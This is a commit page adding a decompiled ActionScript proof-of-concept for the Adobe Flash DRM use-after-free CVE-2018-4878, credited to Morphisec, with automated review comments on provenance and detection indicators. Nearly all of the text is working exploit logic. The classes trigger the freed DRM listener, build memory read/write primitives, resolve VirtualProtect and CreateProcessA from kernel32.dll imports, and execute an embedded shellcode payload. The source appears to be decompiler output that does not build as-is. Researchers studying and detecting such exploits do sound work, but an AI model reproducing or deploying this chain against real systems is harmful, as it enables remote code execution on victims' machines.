
Commit 3cb93b0

committedFeb 9, 2018
added PoC from morphisec
1 parent f03757f commit 3cb93b0

12 files changed

+1070
-0
lines changed
 
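--- /dev/null
+++ b/<PATH NOT SHOWN ON PAGE>
@@ -0,0 +1,92 @@
+package
+{
+import com.adobe.tvsdk.mediacore.DRMOperationCompleteListener;
+
+public class DRM_obj implements DRMOperationCompleteListener
+{
+
+
+var a1:uint = 4369;
+
+var a2:uint = 8738;
+
+var a3:uint = 13107;
+
+var a4:uint = 17476;
+
+var a5:uint = 21845;
+
+var a6:uint = 26214;
+
+var a7:uint = 30583;
+
+var a8:uint = 34952;
+
+var a9:uint = 39321;
+
+var a10:uint = 43690;
+
+var a11:uint = 4369;
+
+var a12:uint = 8738;
+
+var a13:uint = 13107;
+
+var a14:uint = 17476;
+
+var a15:uint = 21845;
+
+var a16:uint = 26214;
+
+var a17:uint = 30583;
+
+var a18:uint = 34952;
+
+var a19:uint = 39321;
+
+var a20:uint = 43690;
+
+var a21:uint = 4369;
+
+var a22:uint = 8738;
+
+var a23:uint = 13107;
+
+var a24:uint = 17476;
+
+var a25:uint = 21845;
+
+var a26:uint = 26214;
+
+var a27:uint = 30583;
+
+var a28:uint = 34952;
+
+var a29:uint = 39321;
+
+var a30:uint = 43690;
+
+var a31:uint = 4369;
+
+var a32:uint = 8738;
+
+var a33:uint = 13107;
+
+var a34:uint = 17476;
+
+var a35:uint = 17476;
+
+public function DRM_obj()
+{
+super();
+}
+
+public function onDRMOperationComplete() : void
+{
+}
+
+public function onDRMError(param1:uint, param2:uint, param3:String, param4:String) : void
+{
+}
+}
+}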
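Review bot: None of the added class files records what it is or where it came from; the only provenance on the page is the commit message and the sample hash embedded in the .report filename (53fa83d02cc60765a75abd0921f5084c03e0b7521a61c4260176e68b6a402834). A header comment on line 1 of this file, and likewise on MainExp, Mem_Arr, Primit, UAFGenerator and gadget, should tie the source to that sample, e.g. `// Apparently decompiled from the CVE-2018-4878 SWF sample sha256 53fa83d0...a402834; see the accompanying .report file`. Without it the class files cannot be matched back to the binary they were recovered from when the report is consulted later, and the empty onDRMOperationComplete/onDRMError handlers on lines 84-90 give no hint that the class exists only to satisfy the DRMOperationCompleteListener interface.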
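--- /dev/null
+++ b/<PATH NOT SHOWN ON PAGE>
@@ -0,0 +1,29 @@
+package
+{
+import flash.display.Sprite;
+import flash.utils.ByteArray;
+import flash.utils.Endian;
+
+public class MainExp extends Sprite
+{
+
+public static var var_1:Class = shellcodBytes;
+
+public static var data14:ByteArray;
+
+
+private var var_3:UAFGenerator;
+
+public function MainExp()
+{
+super();
+data14 = new var_1() as ByteArray;
+data14.endian = Endian.LITTLE_ENDIAN;
+this.var_3 = new UAFGenerator(this);
+}
+
+public function flash21() : void
+{
+}
+}
+}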
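--- /dev/null
+++ b/<PATH NOT SHOWN ON PAGE>
@@ -0,0 +1,64 @@
+package
+{
+import flash.utils.ByteArray;
+
+public dynamic class Mem_Arr extends ByteArray
+{
+
+
+var a1:uint = 17;
+
+var a2:uint = 34;
+
+var a3:uint = 51;
+
+var a4:uint = 68;
+
+var a5:uint = 85;
+
+var a6:uint = 102;
+
+var a7:uint = 119;
+
+var a8:uint = 136;
+
+var a9:uint = 153;
+
+var a10:uint = 170;
+
+var a11:uint = 187;
+
+var a12:Object;
+
+var a13:Object;
+
+public function Mem_Arr()
+{
+super();
+this.a12 = this;
+}
+
+public function flash25() : Object
+{
+var _loc_:Object = this.flash27(this.a13 as Number);
+return _loc_;
+}
+
+public function flash26(param1:int, parm2:Object) : void
+{
+this["a" + param1++] = parm2.low;
+this["a" + param1] = parm2.hi;
+}
+
+public function flash27(param1:Number) : Object
+{
+this.position = 0;
+this.writeDouble(param1);
+this.position = 0;
+return {
+"hi":this.readUnsignedInt(),
+"low":this.readUnsignedInt()
+};
+}
+}
+}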
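--- /dev/null
+++ b/<PATH NOT SHOWN ON PAGE>
@@ -0,0 +1,106 @@
+package
+{
+import flash.system.Capabilities;
+
+public class Primit
+{
+
+static var flash21:Mem_Arr;
+
+static var flash39:DRM_obj;
+
+static var flash27:uint;
+
+public static var flash70:Boolean;
+
+public static var flash72:Boolean;
+
+public static var var_19:Boolean;
+
+{
+flash70 = Capabilities.isDebugger;
+flash72 = Capabilities.version.toUpperCase().search("WIN") >= 0;
+var_19 = Capabilities.version.toUpperCase().search("MAC") >= 0;
+}
+
+public function Primit()
+{
+super();
+}
+
+static function flash32(param1:uint) : uint
+{
+if(param1 < 4096 || param1 >= 3221225472)
+{
+throw new Error("");
+}
+flash21.position = param1;
+return flash21.readUnsignedInt();
+}
+
+static function flash34(param1:uint, param2:uint) : *
+{
+if(param1 < 4096 || param1 >= 3221225472)
+{
+throw new Error("");
+}
+flash21.position = param1;
+flash21.writeUnsignedInt(param2);
+}
+
+static function flash35(param1:Object) : uint
+{
+flash21.a13 = param1;
+return flash39.a32 - 1;
+}
+
+static function flash36(param1:Object) : uint
+{
+var _loc2_:uint = flash35(param1) + 24;
+_loc2_ = flash32(_loc2_);
+if(!flash27)
+{
+while(flash27 < 50 && flash32(_loc2_ + flash27) != param1[0])
+{
+flash27 = flash27 + 4;
+}
+if(flash27 >= 50)
+{
+throw new Error("");
+}
+}
+return _loc2_ + flash27;
+}
+
+public static function flash20(:Mem_Arr, :DRM_obj) : *
+{
+var var_7:uint = 0;
+var Primit0:uint = 0;
+var var_11:Mem_Arr = param1;
+try
+{
+flash21 = var_11;
+var_7 = var_11.length;
+flash39 = param2;
+if(var_7 != 4294967295)
+{
+throw new Error("");
+}
+if(!flash72)
+{
+throw new Error("");
+}
+gadget.flash20();
+return;
+}
+catch(e:Error)
+{
+return;
+}
+}
+
+public static function method_3(param1:uint) : String
+{
+}
+}
+}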
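Review bot: The signature on line 75, `public static function flash20(:Mem_Arr, :DRM_obj) : *`, carries no parameter names while the body reads param1 and param2, and `Primit0` (line 78) and the bodiless `method_3` (lines 102-104) are dead, which marks this file as decompiler output rather than buildable source; the same holds for UAFGenerator line 31 (`var param1:MainExp = param1;`) and line 76 (`var _loc2_:uint = null;`). A comment at the top of the class should state that explicitly, e.g. `// Decompiler output kept for analysis; not expected to compile as-is`, so the files are handled as analysis artifacts and not as a build target. Worth noting in the same comment that every failure path is `throw new Error("")` and that flash20 ends in `catch(e:Error) { return; }` on lines 96-99, so a quiet return from this file says nothing about which check (the length test on line 85 or the Windows-only test on line 89) was hit.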
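--- /dev/null
+++ b/<PATH NOT SHOWN ON PAGE>
@@ -0,0 +1,107 @@
+package
+{
+import com.adobe.tvsdk.mediacore.MediaPlayer;
+import com.adobe.tvsdk.mediacore.PSDK;
+import com.adobe.tvsdk.mediacore.PSDKEventDispatcher;
+import flash.events.TimerEvent;
+import flash.net.LocalConnection;
+import flash.utils.Endian;
+import flash.utils.Timer;
+
+public class UAFGenerator
+{
+
+
+var var_16:DRM_obj;
+
+var var_15:MediaPlayer;
+
+var var_13:DRM_obj;
+
+var var_17:Mem_Arr;
+
+var var_14:Timer;
+
+var var_18:uint;
+
+var var_1:MainExp;
+
+public function UAFGenerator(param1:MainExp)
+{
+var param1:MainExp = param1;
+;
+super();
+this.var_1 = param1;
+this.method_2();
+try
+{
+new LocalConnection().connect("foo");
+new LocalConnection().connect("foo");
+}
+catch(e:Error)
+{
+this.var_13 = new DRM_obj();
+}
+this.var_14 = new Timer(100,1000);
+this.var_14.addEventListener("timer",this.method_1);
+this.var_14.start();
+}
+
+public function method_2() : void
+{
+var _loc1_:PSDK = PSDK.pSDK;
+var _loc2_:PSDKEventDispatcher = _loc1_.createDispatcher();
+this.var_15 = _loc1_.createMediaPlayer(_loc2_);
+this.var_16 = new DRM_obj();
+this.var_15.drmManager.initialize(this.var_16);
+this.var_16 = null;
+}
+
+public function method_1(param1:TimerEvent) : void
+{
+if(this.var_13.a1 != 4369)
+{
+this.var_14.stop();
+this.flash25();
+}
+}
+
+public function flash24() : void
+{
+}
+
+public function flash25() : void
+{
+var _loc1_:int = 0;
+var _loc2_:uint = null;
+this.var_17 = new Mem_Arr();
+this.var_17.length = 512;
+if(this.var_13.a14 != 0)
+{
+_loc1_ = 0;
+while(_loc1_ < 5)
+{
+this.var_13.a32 = this.var_13.a14 + 8 * _loc1_ + 7;
+this.var_17.flash26(_loc1_ * 2 + 1,this.var_17.flash25());
+_loc1_++;
+}
+this.var_17.a11 = 0;
+this.var_18 = uint(uint(this.var_13.a14));
+this.var_13.a14 = this.var_13.a31 + 19 * 4 + 16 - 1;
+_loc2_ = this.var_13.a22 ^ this.var_13.a26;
+this.var_13.a22 = 0;
+this.var_13.a23 = -1;
+this.var_13.a24 = -1;
+this.var_13.a26 = this.var_13.a22 ^ _loc2_;
+this.var_13.a27 = this.var_13.a23 ^ _loc2_;
+this.var_13.a28 = this.var_13.a24 ^ _loc2_;
+this.var_13.a29 = this.var_13.a25 ^ _loc2_;
+this.var_17.endian = Endian.LITTLE_ENDIAN;
+Primit.flash20(this.var_17,this.var_13);
+this.var_13.a14 = this.var_18;
+return;
+}
+this.var_1.flash21();
+}
+}
+}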
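--- /dev/null
+++ b/<PATH NOT SHOWN ON PAGE>
@@ -0,0 +1,179 @@
+package
+{
+class gadget extends Primit
+{
+
+static var CreateProcessFunc:uint;
+
+static var method_2:uint;
+
+
+function gadget()
+{
+super();
+}
+
+static function flash1000(param1:uint = 0, ... rest) : *
+{
+}
+
+static function findfunc() : uint
+{
+var b0:uint = 0;
+var b:uint = 0;
+var var_12:uint = 0;
+var size:uint = 0;
+var oft:uint = 0;
+var ft:uint = 0;
+var gadget3:uint = 0;
+var c:int = 0;
+try
+{
+for(b0 = flash32(flash35(flash21)) & 4294901760,b = b0 - 8388608; var_12 < 512; )
+{
+if((flash32(b) & 65535) == 23117)
+{
+b0 = 0;
+break;
+}
+var_12++;
+b = b - 65536;
+}
+if(!b0)
+{
+method_2 = b;
+b0 = b + flash32(b + 60);
+if(flash32(b0) == 17744)
+{
+size = flash32(b0 + 132);
+for(b0 = b + flash32(b0 + 128),var_12 = 3 * 4; var_12 < size; var_12 = var_12 + 5 * 4)
+{
+flash21.position = b + flash32(b0 + var_12);
+if(flash21.readUTFBytes(12).toLowerCase() == "kernel32.dll")
+{
+oft = flash32(b0 + var_12 - 3 * 4);
+ft = flash32(b0 + var_12 + 4);
+break;
+}
+}
+if(!(oft == 0 || ft == 0))
+{
+oft = oft + b;
+var_12 = 0;
+while(var_12 < 256)
+{
+b0 = flash32(oft);
+if(b0 == 0)
+{
+throw new Error("");
+}
+flash21.position = b + b0;
+if(flash21.readUTF().toLowerCase() == "virtualprotect")
+{
+gadget3 = flash32(b + ft + var_12 * 4);
+c++;
+if(c > 1)
+{
+break;
+}
+}
+else
+{
+flash21.position = b + b0;
+if(flash21.readUTF().toLowerCase() == "createprocessa")
+{
+CreateProcessFunc = flash32(b + ft + var_12 * 4);
+c++;
+if(c > 1)
+{
+break;
+}
+}
+}
+var_12++;
+oft = oft + 4;
+}
+return gadget3;
+}
+throw new Error("");
+}
+throw new Error("");
+}
+throw new Error("");
+}
+catch(e:Error)
+{
+throw new Error("");
+}
+return 0;
+}
+
+static function method_5(param1:uint, param2:uint, param3:uint) : *
+{
+var _loc4_:uint = 0;
+flash1000();
+var _loc5_:uint = flash35(flash1000);
+var _loc6_:uint = flash32(flash32(flash32(_loc5_ + 8) + 20) + 4) + (!!flash70?188:176);
+if(flash32(_loc6_) < 65536)
+{
+_loc6_ = _loc6_ + 4;
+}
+_loc6_ = flash32(_loc6_);
+var _loc7_:uint = flash32(_loc6_);
+var _loc8_:uint = flash32(_loc5_ + 28);
+var _loc9_:uint = flash32(_loc5_ + 32);
+var _loc10_:Vector.<uint> = new Vector.<uint>(256);
+while(_loc4_ < 256)
+{
+_loc10_[_loc4_] = flash32(_loc7_ - 128 + _loc4_ * 4);
+_loc4_++;
+}
+_loc10_[32 + 7] = param1;
+flash34(_loc5_ + 28,param2);
+flash34(_loc5_ + 32,param3);
+flash34(_loc6_,flash36(_loc10_) + 128);
+var _loc11_:Array = new Array(65);
+var _loc12_:* = flash1000.call.apply(null,_loc11_);
+flash34(_loc6_,_loc7_);
+flash34(_loc5_ + 28,_loc8_);
+flash34(_loc5_ + 32,_loc9_);
+}
+
+static function flash20() : *
+{
+var s:int = 0;
+var flash2003:Array = null;
+var flash2005:Vector.<uint> = null;
+var res:* = undefined;
+var flash2004:String = null;
+try
+{
+flash2003 = [];
+MainExp.data14.position = 0;
+for(s = 0; s < MainExp.data14.length; s = s + 4)
+{
+flash2003.push(MainExp.data14.readUnsignedInt());
+}
+flash2005 = Vector.<uint>(flash2003);
+var gadget4:uint = flash36(flash2005);
+var gadget7:uint = findfunc();
+if(gadget7 != 0)
+{
+method_5(gadget7,gadget4,flash2005.length * 4);
+var gadget8:uint = flash35(flash1000);
+gadget8 = flash32(flash32(gadget8 + 28) + 8) + 4;
+var gadget9:uint = flash32(gadget8);
+flash34(gadget8,gadget4);
+res = flash1000.call(null,CreateProcessFunc);
+flash34(gadget8,gadget9);
+return;
+}
+throw new Error("");
+}
+catch(e:Error)
+{
+throw new Error("");
+}
+}
+}
+}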
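Review bot: For anyone using this file for detection rather than reproduction, the header comment should name the handles the code leaves in the clear: the literal strings `"kernel32.dll"`, `"virtualprotect"` and `"createprocessa"` on lines 52, 71 and 83 that findfunc compares names against, and the final `res = flash1000.call(null,CreateProcessFunc);` on line 167, which means a successful run ends with the Flash host process creating a child process. A comment above line 20 along the lines of `// findfunc: appears to locate a PE header and walk its kernel32.dll import entries to resolve VirtualProtect and CreateProcessA; the plain-text names are static indicators` would give that context without restating the code. `flash2004` (line 148) and `res` (line 167) are assigned but never read, and the catch on lines 173-176 rethrows an empty Error in place of the one caught, so nothing about which stage failed survives to the caller; the same pattern is on lines 104-107. The shellcode itself is not in this section but in the 449-line .report/shellcodBytes asset, which the page does not render.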
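--- /dev/null
+++ b/<PATH NOT SHOWN ON PAGE>
@@ -0,0 +1,18 @@
+package mx.core
+{
+import flash.utils.ByteArray;
+
+use namespace mx_internal;
+
+public class ByteArrayAsset extends ByteArray implements IFlexAsset
+{
+
+mx_internal static const VERSION:String = "4.6.0.23201";
+
+
+public function ByteArrayAsset()
+{
+super();
+}
+}
+}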
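--- /dev/null
+++ b/<PATH NOT SHOWN ON PAGE>
@@ -0,0 +1,7 @@
+package mx.core
+{
+public interface IFlexAsset
+{
+
+}
+}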
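--- /dev/null
+++ b/<PATH NOT SHOWN ON PAGE>
@@ -0,0 +1,4 @@
+package mx.core
+{
+public namespace mx_internal = "http://www.adobe.com/2006/flex/mx/internal";
+}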
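--- /dev/null
+++ b/<PATH NOT SHOWN ON PAGE>
@@ -0,0 +1,15 @@
+package
+{
+import mx.core.ByteArrayAsset;
+
+[ExcludeClass]
+public class shellcodBytes extends ByteArrayAsset
+{
+
+
+public function shellcodBytes()
+{
+super();
+}
+}
+}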

‎CVE-2018-4878-Adobe-Flash-DRM-UAF-0day/swf-53fa83d02cc60765a75abd0921f5084c03e0b7521a61c4260176e68b6a402834.report

+449
